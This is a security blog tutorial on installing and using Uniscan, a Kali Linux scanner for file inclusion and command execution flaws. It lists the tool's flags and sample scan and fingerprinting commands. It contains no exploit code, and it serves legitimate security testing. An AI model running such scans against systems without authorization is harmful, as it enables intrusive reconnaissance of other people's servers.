tools

SecurityTrails Blog · Nov 09 · by Esteban Borges

Uniscan: An RFI, LFI, and RCE Vulnerability Scanner

Reading time: 6 minutes
Listen to this article

When scanning remote hosts and web applications, the danger of file inclusion attacks is an important consideration, particularly when dealing with web applications that support plugins such as WordPress.

An RFI, or remote file inclusion attack, targets web applications that make use of includes via external scripts (commonly known as application plugins), hooks, themes, anything that is dynamically included in the web application during runtime.

If these includes contain vulnerabilities, it’s highly likely that exploiting the includes can lead to the main web application being exploitable.

That’s why today we’ll take a look at the Uniscan project. In the project’s own words, Uniscan is a simple Remote File Include, Local File Include, and Remote Command Execution vulnerability scanner.

Identify Your Organization’s Top Risks Discover how Attack Surface Reduction can unveil
critical risks for your entire IT infrastructure

Installation

We recommend using Kali Linux for Uniscan as it is available for easy installation via the package manager.

Installing Uniscan on Kali Linux is relatively straightforward, as it can be installed directly via the APT package manager and does not need compiling from source.

First, we update our APT package manager information with the following command:

apt update

Next, we proceed to install Uniscan:

apt install uniscan
Uniscan installation

To verify a successful Uniscan installation, let’s run the following command:

sudo uniscan

This should then return the following output, which displays the options/flags Uniscan has available:

Uniscan options

Configuration

Uniscan can run with minimal configuration as well, but it does allow for a good amount of customization:

  • -h — The -h flag shows us all the options available under Uniscan.
  • -u — The -u flag is used to specify the URL being scanned, for example: https://www.example.com/
  • -f — If you wish to scan a list of URLs, you can input them into a text file and reference them with the -f flag as well.
  • -b — Scans can take a while to complete if you have multiple URLs to scan. Using the -b flag pushes Uniscan to run in the background; alternatively, you can run Uniscan under a “screen” session as well under Linux.
  • -q — The -q flag enables Directory-based checks for the target being scanned.
  • -w — The “-w” flag enables Uniscan to check for files present on the remote host being scanned.
  • -e — The “-e” flag enables Uniscan to check for robots.txt and sitemap.xml, which can further help identify the type of script/web application running on the target host.
  • -d — The “-d” flag enables Dynamic checks within Uniscan to check for any dynamic file includes.
  • -s — The “-s” flag enables Static checks within Uniscan to check for any static file includes.
  • -r — The “-r” flag enables stress checks to be run on the target being scanned.
  • -i and -o flags perform Bing and Google searches for dorks related to the target being scanned.
  • -g — The “-g” flag is used for web fingerprinting, this helps identify what web application is running on the web server, what plugins are enabled (for example, in WordPress), what version of WordPress is running on the server, and more.
  • -j — The “-j” flag is used to enable the server fingerprint check/listing, which allows for identification of the server software. This performs actions such as ping, Nmap, traceroute, and listing of the web server and operating system running.

Testing and results

To run a basic scan on a web app, we use the flags “qweds” which instruct Uniscan to perform the following:

  • Directory checks (q)
  • File checks (w)
  • Robots/sitemap checks (e)
  • Dynamic file include checks (d)
  • Static file include checks (s)

The checks performed by the flags “qweds” can all be performed in the same run, with the command:

sudo uniscan -u https://target.webapp.url -qweds

Note: Replace https://target.webapp.url with the actual URL you wish to scan.

Which then returns to us the following output:

Uniscan output

As seen above, when Directory and File checks are being performed, Uniscan will find and list directories as well as files seen on the target being scanned.

Next, Uniscan performs checks on the robot.txt, sitemap, and begins enumerating every external host linked off the target being scanned:

Uniscan external hosts enumeration

Uniscan also lists email addresses found on the web application being scanned, as shown in the following screenshot:

Uniscan emails list

Then, Uniscan loads its plugins to perform the RFI (remote file inclusion) attack tests, XSS, SQL injection tests, and others:

Uniscan attack test

Last but not least, the web application is checked for any web shells and the result is saved into a .html formatted report file:

Uniscan web shells testing

Running a web fingerprinting scan

Running a web fingerprinting scan is another handy Uniscan feature. This option runs checks against the web application being scanned and tries to identify it along with running other scans such as capturing error information, WHOIS information, language, and interesting strings.

To run a web fingerprinting scan, we use the -g and -u flags:

sudo uniscan -g -u scanme.nmap.org

Which then returns the following results:

Uniscan web fingerprinting scan

Running a server fingerprinting scan

Similar to the web fingerprinting scan, running a server fingerprinting scan is another key Uniscan feature, one that runs a series of tests such as ping, traceroute, Nmap, and Nslookup:

To run a server fingerprinting scan, we use the -j and -u flags:

sudo uniscan -j -u scanme.nmap.org

Which then returns the following ping and traceroute results:

Uniscan server fingerprinting scan

Followed by the Nslookup results:

Nslookup results

And, most importantly, the Nmap results of every port discovered and probed:

Nmap port scan

Summary

While this project is dead since many years ago, it’s still shipped in the Kali Linux repository and proves itself to be a good addition for any security analysis toolkit. The tool also provides other key features, such as stress checks and generation of the scan result into an HTML-formatted file.

Furthermore, Uniscan also performs key fingerprinting-related features such as web fingerprinting checks which allow one to find out which version of a web application is being run, and which plugins are enabled. Another interesting feature is the server fingerprinting feature that allows you to find out more about the server itself, performing scans such as Nmap scans, traceroutes, ping checks, identifying the web server and operating system running on the server as well.

Last but not least, with its simple, painless install procedure and availability via the APT package manager on KaliLinux itself, Uniscan integrates into one’s security toolset and is easily usable.

Esteban Borges Blog Author
ESTEBAN BORGES

Esteban is a seasoned security researcher and cybersecurity specialist with over 15 years of experience. Since joining SecurityTrails in 2017 he’s been our go-to for technical server security and source intelligence info.